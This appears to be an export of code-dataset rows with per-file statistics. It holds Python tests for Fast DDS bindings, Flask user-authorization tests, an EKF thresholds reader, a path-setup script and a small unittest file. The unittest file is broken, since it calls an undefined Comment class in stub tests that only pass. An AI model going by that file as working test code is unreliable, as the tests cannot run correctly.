test(fastdds.StatusMask.all(), fastdds.StatusMask_all())
test(fastdds.StatusMask.none(), fastdds.StatusMask_none())
test(fastdds.StatusMask.data_available(),
fastdds.StatusMask_data_available())
test(fastdds.StatusMask.data_on_readers(),
fastdds.StatusMask_data_on_readers())
test(fastdds.StatusMask.inconsistent_topic(),
fastdds.StatusMask_inconsistent_topic())
test(fastdds.StatusMask.liveliness_changed(),
fastdds.StatusMask_liveliness_changed())
test(fastdds.StatusMask.liveliness_lost(),
fastdds.StatusMask_liveliness_lost())
test(fastdds.StatusMask.offered_deadline_missed(),
fastdds.StatusMask_offered_deadline_missed())
test(fastdds.StatusMask.offered_incompatible_qos(),
fastdds.StatusMask_offered_incompatible_qos())
test(fastdds.StatusMask.publication_matched(),
fastdds.StatusMask_publication_matched())
test(fastdds.StatusMask.requested_deadline_missed(),
fastdds.StatusMask_requested_deadline_missed())
test(fastdds.StatusMask.requested_incompatible_qos(),
fastdds.StatusMask_requested_incompatible_qos())
test(fastdds.StatusMask.sample_lost(),
fastdds.StatusMask_sample_lost())
test(fastdds.StatusMask.sample_rejected(),
fastdds.StatusMask_sample_rejected())
test(fastdds.StatusMask.subscription_matched(),
fastdds.StatusMask_subscription_matched())
m = fastdds.StatusMask_data_available() << \
fastdds.StatusMask_data_on_readers() << \
fastdds.StatusMask_inconsistent_topic() << \
fastdds.StatusMask_liveliness_changed() << \
fastdds.StatusMask_liveliness_lost() << \
fastdds.StatusMask_offered_deadline_missed() << \
fastdds.StatusMask_offered_incompatible_qos() << \
fastdds.StatusMask_publication_matched() << \
fastdds.StatusMask_requested_deadline_missed() << \
fastdds.StatusMask_requested_incompatible_qos() << \
fastdds.StatusMask_sample_lost() << \
fastdds.StatusMask_sample_rejected() << \
fastdds.StatusMask_subscription_matched()
test(fastdds.StatusMask.data_available() <<
fastdds.StatusMask.data_on_readers() <<
fastdds.StatusMask.inconsistent_topic() <<
fastdds.StatusMask.liveliness_changed() <<
fastdds.StatusMask.liveliness_lost() <<
fastdds.StatusMask.offered_deadline_missed() <<
fastdds.StatusMask.offered_incompatible_qos() <<
fastdds.StatusMask.publication_matched() <<
fastdds.StatusMask.requested_deadline_missed() <<
fastdds.StatusMask.requested_incompatible_qos() <<
fastdds.StatusMask.sample_lost() <<
fastdds.StatusMask.sample_rejected() <<
fastdds.StatusMask.subscription_matched(),
m)
def test_lookup_datareader(topic, subscriber):
"""
This test checks:
- subscriber::lookup_datareader
"""
datareader = subscriber.create_datareader(
topic, fastdds.DATAREADER_QOS_DEFAULT)
assert(datareader is not None)
datareader2 = subscriber.lookup_datareader('Complete')
assert(datareader2 is not None)
assert(datareader == datareader2)
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.delete_datareader(datareader))
def test_listener_ownership(participant, writer_participant, topic,
writer_topic, publisher):
def create_subcriber():
listener = SubscriberListener()
return participant.create_subscriber(
fastdds.SUBSCRIBER_QOS_DEFAULT, listener)
subscriber = create_subcriber()
datareader = subscriber.create_datareader(
topic, fastdds.DATAREADER_QOS_DEFAULT)
datawriter = publisher.create_datawriter(
writer_topic, fastdds.DATAWRITER_QOS_DEFAULT)
time.sleep(1)
factory = fastdds.DomainParticipantFactory.get_instance()
assert(fastdds.ReturnCode_t.RETCODE_OK ==
publisher.delete_datawriter(datawriter))
assert(fastdds.ReturnCode_t.RETCODE_OK ==
writer_participant.delete_topic(writer_topic))
assert(fastdds.ReturnCode_t.RETCODE_OK ==
writer_participant.delete_publisher(publisher))
assert(fastdds.ReturnCode_t.RETCODE_OK ==
factory.delete_participant(writer_participant))
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.delete_datareader(datareader))
assert(fastdds.ReturnCode_t.RETCODE_OK ==
participant.delete_topic(topic))
assert(fastdds.ReturnCode_t.RETCODE_OK ==
participant.delete_subscriber(subscriber))
assert(fastdds.ReturnCode_t.RETCODE_OK ==
factory.delete_participant(participant))
| 38.778947
| 77
| 0.710007
| 2,209
| 22,104
| 6.792666
| 0.065188
| 0.202799
| 0.071376
| 0.049583
| 0.841053
| 0.817394
| 0.804132
| 0.763745
| 0.750883
| 0.695768
| 0
| 0.002404
| 0.190689
| 22,104
| 569
| 78
| 38.8471
| 0.83638
| 0.060849
| 0
| 0.711538
| 0
| 0
| 0.007791
| 0.004508
| 0
| 0
| 0
| 0
| 0.21875
| 1
| 0.064904
| false
| 0
| 0.009615
| 0.007212
| 0.100962
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
449e68ac90a50f51637af54797823be1062b5759
| 214
|
py
|
Python
|
app/__init__.py
|
jumbobumbo/mr_roboto
|
12ed7b99d0831313f5ec6cc47f9b2a41f936b6a5
|
[
"BSD-2-Clause"
] | null | null | null |
app/__init__.py
|
jumbobumbo/mr_roboto
|
12ed7b99d0831313f5ec6cc47f9b2a41f936b6a5
|
[
"BSD-2-Clause"
] | null | null | null |
app/__init__.py
|
jumbobumbo/mr_roboto
|
12ed7b99d0831313f5ec6cc47f9b2a41f936b6a5
|
[
"BSD-2-Clause"
] | null | null | null |
import sys
import os
sys.path.append(os.path.abspath(os.path.join(__file__)))
sys.path.append(os.path.abspath(os.path.join(__file__, "/common")))
sys.path.append(os.path.abspath(os.path.join(__file__, "/scripts")))
| 42.8
| 68
| 0.757009
| 36
| 214
| 4.166667
| 0.277778
| 0.24
| 0.26
| 0.3
| 0.8
| 0.8
| 0.8
| 0.8
| 0.8
| 0.8
| 0
| 0
| 0.037383
| 214
| 5
| 68
| 42.8
| 0.728155
| 0
| 0
| 0
| 0
| 0
| 0.069767
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
44b5d138cb8c15e10b937b9264327f6771aec9f1
| 3,303
|
py
|
Python
|
tests/modules/users/resources/test_getting_users_info.py
|
IsmaelJS/test-github-actions
|
97223df261e9736c46875f590c9593dbac0d417b
|
[
"MIT"
] | 1,420
|
2015-11-20T01:25:14.000Z
|
2022-03-22T03:51:33.000Z
|
tests/modules/users/resources/test_getting_users_info.py
|
IsmaelJS/test-github-actions
|
97223df261e9736c46875f590c9593dbac0d417b
|
[
"MIT"
] | 151
|
2016-01-07T09:11:42.000Z
|
2020-11-17T08:37:07.000Z
|
tests/modules/users/resources/test_getting_users_info.py
|
IsmaelJS/test-github-actions
|
97223df261e9736c46875f590c9593dbac0d417b
|
[
"MIT"
] | 389
|
2015-11-23T01:14:31.000Z
|
2022-02-07T08:23:11.000Z
|
# encoding: utf-8
# pylint: disable=missing-docstring
import pytest
@pytest.mark.parametrize('auth_scopes', (
('users:write', ),
('users:read', ),
('users:read', 'users:write', ),
))
def test_getting_list_of_users_by_unauthorized_user_must_fail(
flask_app_client,
regular_user,
auth_scopes
):
# pylint: disable=invalid-name
with flask_app_client.login(regular_user, auth_scopes=auth_scopes):
response = flask_app_client.get('/api/v1/users/')
if 'users:read' in auth_scopes:
assert response.status_code == 403
else:
assert response.status_code == 401
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'status', 'message'}
@pytest.mark.parametrize('auth_scopes', (
('users:read', ),
('users:read', 'users:write', ),
))
def test_getting_list_of_users_by_authorized_user(flask_app_client, admin_user, auth_scopes):
# pylint: disable=invalid-name
with flask_app_client.login(admin_user, auth_scopes=auth_scopes):
response = flask_app_client.get('/api/v1/users/')
assert response.status_code == 200
assert response.content_type == 'application/json'
assert isinstance(response.json, list)
assert set(response.json[0].keys()) >= {'id', 'username'}
def test_getting_user_info_by_unauthorized_user(flask_app_client, regular_user, admin_user):
# pylint: disable=invalid-name
with flask_app_client.login(regular_user, auth_scopes=('users:read',)):
response = flask_app_client.get('/api/v1/users/%d' % admin_user.id)
assert response.status_code == 403
assert response.content_type == 'application/json'
assert isinstance(response.json, dict)
assert set(response.json.keys()) >= {'status', 'message'}
def test_getting_user_info_by_authorized_user(flask_app_client, regular_user, admin_user):
# pylint: disable=invalid-name
with flask_app_client.login(admin_user, auth_scopes=('users:read',)):
response = flask_app_client.get('/api/v1/users/%d' % regular_user.id)
assert response.status_code == 200
assert response.content_type == 'application/json'
assert isinstance(response.json, dict)
assert set(response.json.keys()) >= {'id', 'username'}
assert 'password' not in response.json.keys()
def test_getting_user_info_by_owner(flask_app_client, regular_user):
# pylint: disable=invalid-name
with flask_app_client.login(regular_user, auth_scopes=('users:read',)):
response = flask_app_client.get('/api/v1/users/%d' % regular_user.id)
assert response.status_code == 200
assert response.content_type == 'application/json'
assert isinstance(response.json, dict)
assert set(response.json.keys()) >= {'id', 'username'}
assert 'password' not in response.json.keys()
def test_getting_user_me_info(flask_app_client, regular_user):
# pylint: disable=invalid-name
with flask_app_client.login(regular_user, auth_scopes=('users:read',)):
response = flask_app_client.get('/api/v1/users/me')
assert response.status_code == 200
assert response.content_type == 'application/json'
assert isinstance(response.json, dict)
assert set(response.json.keys()) >= {'id', 'username'}
assert 'password' not in response.json.keys()
| 39.795181
| 93
| 0.713291
| 438
| 3,303
| 5.114155
| 0.152968
| 0.064286
| 0.1125
| 0.075
| 0.905804
| 0.883036
| 0.798661
| 0.758036
| 0.758036
| 0.758036
| 0
| 0.010361
| 0.152589
| 3,303
| 82
| 94
| 40.280488
| 0.789925
| 0.067514
| 0
| 0.639344
| 0
| 0
| 0.13774
| 0
| 0
| 0
| 0
| 0
| 0.442623
| 1
| 0.098361
| false
| 0.04918
| 0.016393
| 0
| 0.114754
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
44fce63a84824f8aba9c47077e0af0ff01d1d4bf
| 2,268
|
py
|
Python
|
src/ecl_ekf_analysis/config/thresholds.py
|
JohannesBrand/ecl_ekf_analysis
|
9d0f3875767f94c5a37a676161e42b2e14589e8f
|
[
"BSD-3-Clause"
] | null | null | null |
src/ecl_ekf_analysis/config/thresholds.py
|
JohannesBrand/ecl_ekf_analysis
|
9d0f3875767f94c5a37a676161e42b2e14589e8f
|
[
"BSD-3-Clause"
] | null | null | null |
src/ecl_ekf_analysis/config/thresholds.py
|
JohannesBrand/ecl_ekf_analysis
|
9d0f3875767f94c5a37a676161e42b2e14589e8f
|
[
"BSD-3-Clause"
] | null | null | null |
#! /usr/bin/env python3
"""
returns thresholds
"""
#pylint
import os
import configparser
_thresholds = configparser.ConfigParser()
_thresholds.read([os.path.join(os.path.dirname(__file__), 'thresholds.ini')])
def ecl_innovation_failure_pct(innovation_name: str) -> float:
return _thresholds.getfloat('DEFAULT', '{:s}_innovation_failure_pct'.format(innovation_name))
def ecl_amber_warning_pct(innovation_name: str) -> float:
return _thresholds.getfloat('DEFAULT', '{:s}_amber_warning_pct'.format(innovation_name))
def ecl_amber_failure_pct(innovation_name: str) -> float:
return _thresholds.getfloat('DEFAULT', '{:s}_amber_failure_pct'.format(innovation_name))
def ecl_filter_fault_flag_failure() -> float:
return _thresholds.getfloat('DEFAULT', 'filter_fault_flag_failure')
def imu_coning_warning_max() -> float:
return _thresholds.getfloat('DEFAULT', 'imu_coning_warning_max')
def imu_coning_warning_avg() -> float:
return _thresholds.getfloat('DEFAULT', 'imu_coning_warning_avg')
def imu_high_freq_delta_angle_warning_max() -> float:
return _thresholds.getfloat('DEFAULT', 'imu_high_freq_delta_angle_warning_max')
def imu_high_freq_delta_angle_warning_avg() -> float:
return _thresholds.getfloat('DEFAULT', 'imu_high_freq_delta_angle_warning_avg')
def imu_high_freq_delta_velocity_warning_max() -> float:
return _thresholds.getfloat('DEFAULT', 'imu_high_freq_delta_velocity_warning_max')
def imu_high_freq_delta_velocity_warning_avg() -> float:
return _thresholds.getfloat('DEFAULT', 'imu_high_freq_delta_velocity_warning_avg')
def imu_observed_angle_error_warning_avg() -> float:
return _thresholds.getfloat('DEFAULT', 'imu_observed_angle_error_warning_avg')
def imu_observed_velocity_error_warning_avg() -> float:
return _thresholds.getfloat('DEFAULT', 'imu_observed_velocity_error_warning_avg')
def imu_observed_position_error_warning_avg() -> float:
return _thresholds.getfloat('DEFAULT', 'imu_observed_position_error_warning_avg')
def imu_delta_angle_bias_warning_avg() -> float:
return _thresholds.getfloat('DEFAULT', 'imu_delta_angle_bias_warning_avg')
def imu_delta_velocity_bias_warning_avg() -> float:
return _thresholds.getfloat('DEFAULT', 'imu_delta_velocity_bias_warning_avg')
| 40.5
| 97
| 0.801587
| 298
| 2,268
| 5.557047
| 0.157718
| 0.096618
| 0.190217
| 0.262681
| 0.84058
| 0.813406
| 0.695048
| 0.557367
| 0.482488
| 0.482488
| 0
| 0.000484
| 0.088624
| 2,268
| 56
| 98
| 40.5
| 0.800677
| 0.020723
| 0
| 0
| 0
| 0
| 0.268414
| 0.214641
| 0
| 0
| 0
| 0
| 0
| 1
| 0.441176
| false
| 0
| 0.058824
| 0.441176
| 0.941176
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
78800fbe7849e9a854faf3c5e960f64745a58b26
| 534
|
py
|
Python
|
pitch/test_user.py
|
mukhtarabdirahman/Pitch
|
291463c3bc6d4d2083c2f20b5b3a47e320d8c18b
|
[
"Unlicense"
] | null | null | null |
pitch/test_user.py
|
mukhtarabdirahman/Pitch
|
291463c3bc6d4d2083c2f20b5b3a47e320d8c18b
|
[
"Unlicense"
] | 1
|
2021-06-08T20:49:10.000Z
|
2021-06-08T20:49:10.000Z
|
pitch/test_user.py
|
mukhtarabdirahman/Pitch
|
291463c3bc6d4d2083c2f20b5b3a47e320d8c18b
|
[
"Unlicense"
] | 1
|
2020-07-23T21:58:03.000Z
|
2020-07-23T21:58:03.000Z
|
import unittest
from models import User,Post
class TestUser(unittest.TestCase):
def setUp(self):
self.new_post = Post()
self.new_comment = Comment()
def test_user_instance(self):
pass
def test_post_instance(self):
pass
class TestPost(unittest.TestCase):
def setUp(self):
self.new_post = Post()
self.new_comment = Comment()
def test_user_instance(self):
pass
def test_post_instance(self):
pass
if __name__ == '__main__':
unittest.main()
| 23.217391
| 36
| 0.640449
| 66
| 534
| 4.878788
| 0.318182
| 0.086957
| 0.198758
| 0.149068
| 0.732919
| 0.732919
| 0.732919
| 0.732919
| 0.732919
| 0.732919
| 0
| 0
| 0.264045
| 534
| 23
| 37
| 23.217391
| 0.819338
| 0
| 0
| 0.7
| 0
| 0
| 0.014953
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| false
| 0.2
| 0.1
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.